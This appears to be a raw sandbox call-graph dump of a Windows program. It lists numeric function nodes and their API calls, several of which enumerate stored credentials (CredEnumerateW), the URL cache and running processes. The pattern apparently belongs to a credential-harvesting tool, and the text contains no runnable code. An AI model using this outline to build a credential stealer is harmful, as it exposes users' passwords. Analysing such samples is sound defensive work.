40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39159 404363 38556->39159 38559 40bf5d 39179 40440c 38559->39179 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39182 40bd5d 28 API calls 38572->39182 39183 404423 38572->39183 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39196 4135e0 38576->39196 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39199 4449b9 38593->39199 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39220 444972 GetVersionExW 38599->39220 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39224 444a85 42 API calls 38603->39224 38607->38602 38607->38603 39221 444aa5 42 API calls 38607->39221 39222 40a7a0 GetVersionExW 38607->39222 39223 444a85 42 API calls 38607->39223 38610 40399d 38609->38610 39225 403a16 38610->39225 38612 403a09 39239 40b1ab free free 38612->39239 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39236 40a02c CreateFileW 38614->39236 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39266 40414f memset 38634->39266 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39280 40b1ab free free 38637->39280 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39293 40a6e6 WideCharToMultiByte 38643->39293 38645 4087ed 39294 4095d9 memset 38645->39294 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39313 409b98 GetFileAttributesW 38668->39313 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39314 407fdf 75 API calls 38671->39314 39315 409b98 GetFileAttributesW 38672->39315 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39316 4082c7 198 API calls 38676->39316 39317 409b98 GetFileAttributesW 38677->39317 38680 408987 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39583 413f27 38700->39583 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39588 413959 38708->39588 39604 413ca4 38708->39604 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39618 40b1ab free free 38728->39618 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39619 40b1ab free free 38750->39619 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39620 409cea 38759->39620 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39623 414bb0 wcscpy 38764->39623 38765->38763 38767 414cd2 39624 4145ac RegQueryValueExW 38767->39624 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39625 409b98 GetFileAttributesW 38833->39625 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39626 40bb98 38836->39626 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39660 409a45 GetTempPathW 38842->39660 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39659 40a6e6 WideCharToMultiByte 38846->39659 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39672 424f26 122 API calls 38863->39672 38864 40b8bd memset 39663 425413 17 API calls 38864->39663 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39673 40a734 MultiByteToWideChar 38880->39673 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39664 4253ef 16 API calls 38885->39664 39665 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39665 39666 4253af 17 API calls 38885->39666 39667 4253cf 17 API calls 38885->39667 39668 447280 memset 38885->39668 39669 447960 memset memcpy memcpy memcpy 38885->39669 39670 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39670 39671 447920 memcpy memcpy memcpy 38885->39671 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39765 409b98 GetFileAttributesW 38898->39765 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39766 409b98 GetFileAttributesW 38906->39766 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 